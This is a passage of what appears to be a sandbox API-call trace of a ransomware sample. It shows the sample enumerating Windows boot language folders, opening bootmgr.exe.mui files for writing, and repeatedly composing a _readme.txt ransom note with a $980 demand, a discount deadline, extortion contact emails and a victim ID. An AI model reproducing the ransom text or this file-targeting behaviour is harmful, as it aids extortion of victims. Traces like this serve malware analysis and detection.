video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.053] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.053] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.053] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0210.053] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.053] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.054] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.054] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.054] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0210.054] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.054] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.054] PathFindFileNameW (pszPath="") returned="" [0210.054] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.054] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.055] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.055] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.055] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0210.055] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0210.055] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.055] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.055] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.055] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.056] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0210.056] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.056] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.056] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.056] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.056] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0210.056] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.056] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.056] PathFindFileNameW (pszPath="") returned="" [0210.056] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.058] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.058] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.058] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.059] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0210.059] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0210.059] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.059] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.059] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.059] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.060] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0210.060] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.060] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.060] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.060] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.060] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0210.060] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.060] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.060] PathFindFileNameW (pszPath="") returned="" [0210.060] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.061] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.061] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.061] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.061] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0210.061] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0210.061] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.061] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.061] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.062] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.062] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0210.062] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.062] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.062] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.062] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.062] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0210.062] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.062] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.063] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.063] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.063] FreeLibrary 